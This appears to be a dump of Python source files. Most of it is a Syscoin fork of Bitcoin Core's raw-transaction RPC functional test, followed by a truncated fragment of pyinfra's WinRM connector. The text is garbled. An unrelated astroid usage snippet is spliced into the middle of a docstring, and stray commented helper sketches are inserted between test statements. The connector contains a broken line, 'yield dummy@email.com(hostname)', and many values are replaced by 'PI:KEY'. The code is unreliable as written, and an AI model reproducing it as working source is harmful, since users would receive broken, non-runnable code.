'#!/usr/bin/env python3\n# Copyright (c) 2014-2020 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n""""""Test the rawtransaction RPCs.\n\nTest the following RPCs:\n - createrawtransaction\n - signrawtransactionwithwallet\n - sendrawtransaction\n - decoderawtransaction\n - getrawtransaction\n""""""\n\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom io import BytesIO\nfrom test_framework.messages import CTransaction, ToHex\nfrom test_framework.test_framework import SyscoinTestFramework\nfrom test_framework.util import (\n assert_equal,\n assert_raises_rpc_error,\n find_vout_for_address,\n hex_str_to_bytes,\n)\n\n\nclass multidict(dict):\n """"""Dictionary that allows duplicate keys.\n\n Constructed with a list of (key, value) tuples. 
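# Quick usage sketch for the CallSite class above, assuming the astroid
# package is importable as shown; extract_node() parses a snippet and
# hands back the Call node marked with #@.
import astroid
from astroid.arguments import CallSite

call = astroid.extract_node('''
def f(a, b=2):
    pass
f(1, b=3)  #@
''')
site = CallSite.from_call(call)
print([arg.value for arg in site.positional_arguments])  # [1]
print(sorted(site.keyword_arguments))                    # ['b']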
When dumped by the json module,\n will output invalid json with repeated keys, eg:\n >>> json.dumps(multidict([(1,2),(1,2)])\n \'{""1"": 2, ""1"": 2}\'\n\n Used to test calls to rpc methods with repeated keys in the json object.""""""\n\n def __init__(self, x):\n dict.__init__(self, x)\n self.x = x\n\n def items(self):\n return self.x\n\n\n# Create one-input, one-output, no-fee transaction:\nclass RawTransactionsTest(SyscoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 3\n self.extra_args = [\n [""-txindex""],\n [""-txindex""],\n [""-txindex""],\n ]\n self.supports_cli = False\n\n def skip_test_if_missing_module(self):\n self.skip_if_no_wallet()\n\n def setup_network(self):\n super().setup_network()\n self.connect_nodes(0, 2)\n\n def run_test(self):\n self.log.info(\'prepare some coins for multiple *rawtransaction commands\')\n self.nodes[2].generate(1)\n self.sync_all()\n self.nodes[0].generate(101)\n self.sync_all()\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)\n self.sync_all()\n self.nodes[0].generate(5)\n self.sync_all()\n\n self.log.info(\'Test getrawtransaction on genesis block coinbase returns an error\')\n block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))\n assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block[\'merkleroot\'])\n\n self.log.info(\'Check parameter types and required parameters of createrawtransaction\')\n # Test `createrawtransaction` required parameters\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction)\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [])\n\n # Test `createrawtransaction` invalid extra parameters\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, \'foo\')\n\n # Test `createrawtransaction` invalid `inputs`\n txid = \'PI:KEY\'\n assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, \'foo\', {})\n assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, [\'foo\'], {})\n assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {})\n assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for \'foo\')"", self.nodes[0].createrawtransaction, [{\'txid\': \'foo\'}], {})\n assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not \'PI:KEY\')"", self.nodes[0].createrawtransaction, [{\'txid\': \'PI:KEY\'}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{\'txid\': txid}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': \'foo\'}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': -1}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': 0, \'sequence\': -1}], {})\n\n # Test `createrawtransaction` invalid `outputs`\n address = self.nodes[0].getnewaddress()\n address2 = self.nodes[0].getnewaddress()\n 
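# What the multidict helper above enables, in isolation: json.dumps()
# asks the mapping for items(), so overriding it yields deliberately
# invalid JSON with repeated keys -- exactly what the duplicate-key RPC
# checks below need to put on the wire.
import json

class multidict(dict):
    def __init__(self, x):
        dict.__init__(self, x)
        self.x = x

    def items(self):
        return self.x

print(json.dumps(multidict([('data', 'aa'), ('data', 'bb')])))
# {"data": "aa", "data": "bb"}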
assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], \'foo\')\n self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility\n self.nodes[0].createrawtransaction(inputs=[], outputs=[])\n assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {\'data\': \'foo\'})\n assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {\'foo\': 0})\n assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: \'foo\'})\n assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1})\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": \'aa\'}, {""data"": ""bb""}])\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", \'aa\'), (""data"", ""bb"")]))\n assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{\'a\': 1, \'b\': 2}])\n assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [[\'key-value pair1\'], [\'2\']])\n\n # Test `createrawtransaction` invalid `locktime`\n assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, \'foo\')\n assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1)\n assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296)\n\n # Test `createrawtransaction` invalid `replaceable`\n assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, \'foo\')\n\n self.log.info(\'Check that createrawtransaction accepts an array and object as outputs\')\n tx = CTransaction()\n # One output\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs={address: 99}))))\n assert_equal(len(tx.vout), 1)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}]),\n )\n # Two outputs\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))\n assert_equal(len(tx.vout), 2)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}, {address2: 99}]),\n )\n # Multiple mixed outputs\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=multidict([(address, 99), (address2, 99), (\'data\', \'99\')])))))\n assert_equal(len(tx.vout), 3)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}, {address2: 
99}, {\'data\': \'99\'}]),\n )\n\n for type in [""bech32"", ""p2sh-segwit"", ""legacy""]:\n addr = self.nodes[0].getnewaddress("""", type)\n addrinfo = self.nodes[0].getaddressinfo(addr)\n pubkey = addrinfo[""scriptPubKey""]\n\n self.log.info(\'sendrawtransaction with missing prevtx info (%s)\' %(type))\n\n # Test `signrawtransactionwithwallet` invalid `prevtxs`\n inputs = [ {\'txid\' : txid, \'vout\' : 3, \'sequence\' : 1000}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n\n prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)\n succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])\n assert succ[""complete""]\n if type == ""legacy"":\n del prevtx[""amount""]\n succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])\n assert succ[""complete""]\n\n if type != ""legacy"":\n assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""scriptPubKey"": pubkey,\n ""vout"": 3,\n }\n ])\n\n assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""scriptPubKey"": pubkey,\n ""amount"": 1,\n }\n ])\n assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""scriptPubKey"": pubkey,\n ""vout"": 3,\n ""amount"": 1,\n }\n ])\n assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""vout"": 3,\n ""amount"": 1\n }\n ])\n\n #########################################\n # sendrawtransaction with missing input #\n #########################################\n\n self.log.info(\'sendrawtransaction with missing input\')\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1}] #won\'t exists\n outputs = { self.nodes[0].getnewaddress() : 4.998 }\n rawtx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)\n\n # This will raise an exception since there are missing inputs\n assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx[\'hex\'])\n\n #####################################\n # getrawtransaction with block hash #\n #####################################\n\n # make a tx by sending then generate 2 blocks; block1 has the tx in it\n tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)\n block1, block2 = self.nodes[2].generate(2)\n self.sync_all()\n # We should be able to get the raw transaction by providing the correct block\n gottx = self.nodes[0].getrawtransaction(tx, True, block1)\n assert_equal(gottx[\'txid\'], tx)\n assert_equal(gottx[\'in_active_chain\'], True)\n # We should have the \'in_active_chain\' flag when we don\'t provide a block due to blockindexdb\n gottx = self.nodes[0].getrawtransaction(tx, True)\n assert_equal(gottx[\'txid\'], tx)\n # SYSCOIN\n assert \'in_active_chain\' in gottx\n # We should not get the tx if we provide an unrelated block\n assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2)\n # An invalid block hash should raise the correct errors\n assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True)\n assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for \'foobar\')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"")\n assert_raises_rpc_error(-8, ""parameter 3 must be of 
length 64 (not 8, for \'abcd1234\')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"")\n assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not \'ZZZ0000000000000000000000000000000000000000000000000000000000000\')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"")\n assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"")\n # Undo the blocks and check in_active_chain\n self.nodes[0].invalidateblock(block1)\n gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)\n assert_equal(gottx[\'in_active_chain\'], False)\n self.nodes[0].reconsiderblock(block1)\n assert_equal(self.nodes[0].getbestblockhash(), block2)\n\n if not self.options.descriptors:\n # The traditional multisig workflow does not work with descriptor wallets so these are legacy only.\n # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.\n #########################\n # RAW TX MULTISIG TESTS #\n #########################\n # 2of2 test\n addr1 = self.nodes[2].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[2].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n\n # Tests for createmultisig and addmultisigaddress\n assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""])\n self.nodes[0].createmultisig(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']]) # createmultisig can only take public keys\n assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj[\'pubkey\'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.\n\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr1])[\'address\']\n\n #use balance deltas instead of absolute values\n bal = self.nodes[2].getbalance()\n\n # send 1.2 SYS to msig adr\n txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[2].getbalance(), bal+Decimal(\'1.20000000\')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance\n\n\n # 2of3 test from different nodes\n bal = self.nodes[2].getbalance()\n addr1 = self.nodes[1].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n addr3 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[1].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n addr3Obj = self.nodes[2].getaddressinfo(addr3)\n\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\'], addr3Obj[\'pubkey\']])[\'address\']\n\n txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)\n decTx = self.nodes[0].gettransaction(txId)\n rawTx = self.nodes[0].decoderawtransaction(decTx[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n\n #THIS IS AN INCOMPLETE FEATURE\n #NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION\n assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable\n\n txDetails = self.nodes[0].gettransaction(txId, True)\n rawTx = self.nodes[0].decoderawtransaction(txDetails[\'hex\'])\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'2.20000000\'))\n\n bal = self.nodes[0].getbalance()\n 
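# The blockhash parameter errors exercised above reduce to: the argument
# must be a 64-character hex string. A minimal stand-alone version of
# that check, mirroring the RPC error strings:
import re

def check_blockhash_param(value):
    if len(value) != 64:
        raise ValueError("parameter 3 must be of length 64 (not %d, for '%s')"
                         % (len(value), value))
    if not re.fullmatch(r'[0-9a-fA-F]{64}', value):
        raise ValueError("parameter 3 must be hexadecimal string (not '%s')"
                         % value)

check_blockhash_param('0' * 64)   # passes silently
for bad in ('foobar', 'abcd1234', 'Z' * 64):
    try:
        check_blockhash_param(bad)
    except ValueError as exc:
        print(exc)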
inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'], ""scriptPubKey"" : vout[\'scriptPubKey\'][\'hex\'], ""amount"" : vout[\'value\']}]\n outputs = { self.nodes[0].getnewaddress() : 2.19 }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)\n assert_equal(rawTxPartialSigned[\'complete\'], False) #node1 only has one key, can\'t comp. sign the tx\n\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)\n assert_equal(rawTxSigned[\'complete\'], True) #node2 can sign the tx compl., own two of three keys\n self.nodes[2].sendrawtransaction(rawTxSigned[\'hex\'])\n rawTx = self.nodes[0].decoderawtransaction(rawTxSigned[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[0].getbalance(), bal+Decimal(\'50.00000000\')+Decimal(\'2.19000000\')) #block reward + tx\n\n # 2of2 test for combining transactions\n bal = self.nodes[2].getbalance()\n addr1 = self.nodes[1].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[1].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n\n self.nodes[1].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']])[\'address\']\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']])[\'address\']\n mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)\n\n txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)\n decTx = self.nodes[0].gettransaction(txId)\n rawTx2 = self.nodes[0].decoderawtransaction(decTx[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n\n assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable\n\n txDetails = self.nodes[0].gettransaction(txId, True)\n rawTx2 = self.nodes[0].decoderawtransaction(txDetails[\'hex\'])\n vout = next(o for o in rawTx2[\'vout\'] if o[\'value\'] == Decimal(\'2.20000000\'))\n\n bal = self.nodes[0].getbalance()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'], ""scriptPubKey"" : vout[\'scriptPubKey\'][\'hex\'], ""redeemScript"" : mSigObjValid[\'hex\'], ""amount"" : vout[\'value\']}]\n outputs = { self.nodes[0].getnewaddress() : 2.19 }\n rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)\n self.log.debug(rawTxPartialSigned1)\n assert_equal(rawTxPartialSigned1[\'complete\'], False) #node1 only has one key, can\'t comp. sign the tx\n\n rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)\n self.log.debug(rawTxPartialSigned2)\n assert_equal(rawTxPartialSigned2[\'complete\'], False) #node2 only has one key, can\'t comp. 
sign the tx\n rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1[\'hex\'], rawTxPartialSigned2[\'hex\']])\n self.log.debug(rawTxComb)\n self.nodes[2].sendrawtransaction(rawTxComb)\n rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[0].getbalance(), bal+Decimal(\'50.00000000\')+Decimal(\'2.19000000\')) #block reward + tx\n\n # decoderawtransaction tests\n # witness transaction\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction\n assert_equal(decrawtx[\'vout\'][0][\'value\'], Decimal(\'1.00000000\'))\n assert_raises_rpc_error(-22, \'TX decode failed\', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction\n # non-witness transaction\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction\n assert_equal(decrawtx[\'vout\'][0][\'value\'], Decimal(\'1.00000000\'))\n # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx)\n decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)\n assert_raises_rpc_error(-22, \'TX decode failed\', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction\n assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen\n assert_equal(decrawtx[\'vin\'][0][\'coinbase\'], ""PI:KEY"")\n\n # Basic signrawtransaction test\n addr = self.nodes[1].getnewaddress()\n txid = self.nodes[0].sendtoaddress(addr, 10)\n self.nodes[0].generate(1)\n self.sync_all()\n vout = find_vout_for_address(self.nodes[1], txid, addr)\n rawTx = self.nodes[1].createrawtransaction([{\'txid\': txid, \'vout\': vout}], {self.nodes[1].getnewaddress(): 9.999})\n rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)\n txId = self.nodes[1].sendrawtransaction(rawTxSigned[\'hex\'])\n self.nodes[0].generate(1)\n self.sync_all()\n\n # getrawtransaction tests\n # 1. valid parameters - only supply txid\n assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned[\'hex\'])\n\n # 2. valid parameters - supply txid and 0 for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned[\'hex\'])\n\n # 3. valid parameters - supply txid and False for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned[\'hex\'])\n\n # 4. valid parameters - supply txid and 1 for verbose.\n # We only check the ""hex"" field of the output so we don\'t need to update this test every time the output format changes.\n assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned[\'hex\'])\n\n # 5. valid parameters - supply txid and True for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned[\'hex\'])\n\n # 6. invalid parameters - supply txid and string ""Flase""\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"")\n\n # 7. invalid parameters - supply txid and empty array\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, [])\n\n # 8. 
invalid parameters - supply txid and empty dict\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {})\n\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 1000}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n decrawtx= self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'vin\'][0][\'sequence\'], 1000)\n\n # 9. invalid parameters - sequence number out of range\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : -1}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n assert_raises_rpc_error(-8, \'Invalid parameter, sequence number is out of range\', self.nodes[0].createrawtransaction, inputs, outputs)\n\n # 10. invalid parameters - sequence number out of range\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 4294967296}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n assert_raises_rpc_error(-8, \'Invalid parameter, sequence number is out of range\', self.nodes[0].createrawtransaction, inputs, outputs)\n\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 4294967294}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n decrawtx= self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'vin\'][0][\'sequence\'], 4294967294)\n\n ####################################\n # TRANSACTION VERSION NUMBER TESTS #\n ####################################\n\n # Test the minimum transaction version number that fits in a signed 32-bit integer.\n # As transaction version is unsigned, this should convert to its unsigned equivalent.\n tx = CTransaction()\n tx.nVersion = -0x80000000\n rawtx = ToHex(tx)\n decrawtx = self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'version\'], 0x80000000)\n\n # Test the maximum transaction version number that fits in a signed 32-bit integer.\n tx = CTransaction()\n tx.nVersion = 0x7fffffff\n rawtx = ToHex(tx)\n decrawtx = self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'version\'], 0x7fffffff)\n\n self.log.info(\'sendrawtransaction/testmempoolaccept with maxfeerate\')\n\n # Test a transaction with a small fee.\n txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)\n rawTx = self.nodes[0].getrawtransaction(txId, True)\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'1.00000000\'))\n\n self.sync_all()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'] }]\n # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999\n outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)\n assert_equal(rawTxSigned[\'complete\'], True)\n # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB\n # Thus, testmempoolaccept should reject\n testres = self.nodes[2].testmempoolaccept([rawTxSigned[\'hex\']], 0.00001000)[0]\n assert_equal(testres[\'allowed\'], False)\n assert_equal(testres[\'reject-reason\'], \'max-fee-exceeded\')\n # and sendrawtransaction should throw\n assert_raises_rpc_error(-25, \'Fee exceeds maximum configured by user (e.g. 
-maxtxfee, maxfeerate)\', self.nodes[2].sendrawtransaction, rawTxSigned[\'hex\'], 0.00001000)\n # and the following calls should both succeed\n testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned[\'hex\']])[0]\n assert_equal(testres[\'allowed\'], True)\n self.nodes[2].sendrawtransaction(hexstring=rawTxSigned[\'hex\'])\n\n # Test a transaction with a large fee.\n txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)\n rawTx = self.nodes[0].getrawtransaction(txId, True)\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'1.00000000\'))\n\n self.sync_all()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'] }]\n # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98\n outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)\n assert_equal(rawTxSigned[\'complete\'], True)\n # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB\n # Thus, testmempoolaccept should reject\n testres = self.nodes[2].testmempoolaccept([rawTxSigned[\'hex\']])[0]\n assert_equal(testres[\'allowed\'], False)\n assert_equal(testres[\'reject-reason\'], \'max-fee-exceeded\')\n # and sendrawtransaction should throw\n assert_raises_rpc_error(-25, \'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)\', self.nodes[2].sendrawtransaction, rawTxSigned[\'hex\'])\n # and the following calls should both succeed\n testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned[\'hex\']], maxfeerate=\'0.20000000\')[0]\n assert_equal(testres[\'allowed\'], True)\n self.nodes[2].sendrawtransaction(hexstring=rawTxSigned[\'hex\'], maxfeerate=\'0.20000000\')\n\n\nif __name__ == \'__main__\':\n RawTransactionsTest().main()\n', 'from __future__ import print_function, unicode_literals\n\nimport base64\nimport ntpath\n\nimport click\n\nfrom pyinfra import logger\nfrom pyinfra.api import Config\nfrom pyinfra.api.exceptions import ConnectError, PyinfraError\nfrom pyinfra.api.util import get_file_io, memoize, sha1_hash\n\nfrom .pyinfrawinrmsession import PyinfraWinrmSession\nfrom .util import make_win_command\n\n\ndef _raise_connect_error(host, message, data):\n message = \'{0} ({1})\'.format(message, data)\n raise ConnectError(message)\n\n\n@memoize\ndef show_warning():\n logger.warning(\'The @winrm connector is alpha!\')\n\n\ndef _make_winrm_kwargs(state, host):\n kwargs = {\n }\n\n for key, value in (\n (\'username\', host.data.winrm_user),\n (\'password\', host.data.winrm_password),\n (\'winrm_port\', int(host.data.winrm_port or 0)),\n (\'winrm_transport\', host.data.winrm_transport or \'plaintext\'),\n (\'winrm_read_timeout_sec\', host.data.winrm_read_timeout_sec or 30),\n (\'winrm_operation_timeout_sec\', host.data.winrm_operation_timeout_sec or 20),\n ):\n if value:\n kwargs[key] = value\n\n # FUTURE: add more auth\n # pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp\n # see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12\n\n return kwargs\n\n\ndef make_names_data(hostname):\n\n show_warning()\n\n yield dummy@email.com(hostname), {\'winrm_hostname\': hostname}, []\n\n\ndef connect(state, host):\n \'\'\'\n Connect to a single host. 
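# Back-of-envelope for the maxfeerate checks above: the fee rate in
# SYS/kvB is (fee_sat * 1e-8 SYS/sat) / (vsize / 1000 kvB). The
# 10,000-sat fee on a ~100-vbyte tx is ~0.001 SYS/kvB, well above the
# 0.00001 cap, and the 2,000,000-sat fee lands at ~0.2 SYS/kvB, hence
# the explicit 0.20000000 override in the second round of calls.
def feerate_sys_per_kvb(fee_sat, vsize_bytes):
    return (fee_sat * 1e-8) / (vsize_bytes / 1000.0)

assert round(feerate_sys_per_kvb(10000, 100), 8) == 0.001
assert round(feerate_sys_per_kvb(2000000, 100), 8) == 0.2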
